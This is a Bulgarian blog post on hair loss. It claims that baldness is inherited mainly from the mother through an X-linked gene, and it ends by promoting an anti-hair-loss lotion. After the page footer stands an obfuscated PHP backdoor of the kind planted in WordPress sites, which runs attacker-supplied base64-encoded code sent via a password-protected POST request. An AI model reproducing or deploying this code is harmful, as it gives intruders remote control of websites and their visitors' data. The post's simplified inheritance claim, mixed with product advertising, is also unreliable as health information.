Оплешивяването се наследява от майката | Косопад

Оплешивяването се наследява от майката

Обратно на това, което се вярва, появата на андрогенен косопад или общо оплешивяване, се наследява от майката

оплешивяване66

Един от най- известните митове за косата, който най- много притеснява мъжете, е, че ако бащата е плешив, то и синът ще е такъв. Нищо общо с истината. Всъщност, оплешивяването се наследява от майката, т.е., ако дядо ви по майчина линия е плешив, е много по- възможно и вие да бъдете, отколкото ако вашият баща е така.

Хромозома Х на оплешивяването

В появата на андрогенната алопеция са замесени както андрогенни хормони, така и генетични фактори. Генът, който е основно свързан с оплешивяването, е свързан с хромозома Х, а тя се наследява от майката, а не от бащата. Има подобни оплешивяване67случаи с различни заболявания, като хемофилия, например.

Косата на най- близките роднини (баща, майка, дядовци) служи за ориентир какво може да се случи с вашата, но не е определящ фактор за оплешивяването. Промените в гена могат да останат скрити, могат да се проявяват през поколения или без прекъсване.

Превенцията е най- сигурното оръжие срещу оплешивяването. Има много и различни начини да се справите с проблема. Може да вземете мерки по- рано – да промените храненето си, да се отървете от вредни навици, да полагате специални грижи за косата си и др. Връщането на окапалата коса обаче, също вече е проблем, поне с лосиона срещу косопад и оплешивяване „Ефект- 2“.

13. декември 2013 22:38:51 от Надя Колева
Категории: Любопитно за косопада | Етикети: , , , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}